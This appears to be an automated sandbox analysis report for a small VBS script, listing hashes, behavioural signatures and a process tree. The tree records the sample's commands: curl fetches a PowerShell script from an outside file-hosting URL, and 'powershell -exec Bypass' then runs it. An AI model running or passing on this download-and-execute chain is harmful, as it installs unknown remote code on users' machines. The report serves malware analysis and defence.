Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
16/01/2023, 09:37
Static task
static1
Behavioral task
behavioral1
Sample
asd.vbs
Resource
win7-20221111-en
4 signatures
150 seconds
General
-
Target
asd.vbs
-
Size
484B
-
MD5
1663574ead24fc758c224a04057e9da3
-
SHA1
c2fb493d802d82d93cbb139ab3c3899c31a68bc4
-
SHA256
7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba
-
SHA512
ab1d8b4e67f5b9772e2a34ce7ab5695f604fc510d255fdad3b12d1a0c2793c2706172d2f84a29e67f239cf951b328fab30e273b1ee383cee2db4add9704f3840
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1616 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 532 wrote to memory of 272 532 WScript.exe 28 PID 532 wrote to memory of 272 532 WScript.exe 28 PID 532 wrote to memory of 272 532 WScript.exe 28 PID 272 wrote to memory of 764 272 cmd.exe 30 PID 272 wrote to memory of 764 272 cmd.exe 30 PID 272 wrote to memory of 764 272 cmd.exe 30 PID 532 wrote to memory of 1820 532 WScript.exe 31 PID 532 wrote to memory of 1820 532 WScript.exe 31 PID 532 wrote to memory of 1820 532 WScript.exe 31 PID 1820 wrote to memory of 772 1820 cmd.exe 33 PID 1820 wrote to memory of 772 1820 cmd.exe 33 PID 1820 wrote to memory of 772 1820 cmd.exe 33 PID 772 wrote to memory of 1616 772 cmd.exe 34 PID 772 wrote to memory of 1616 772 cmd.exe 34 PID 772 wrote to memory of 1616 772 cmd.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\system32\cmd.execmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
-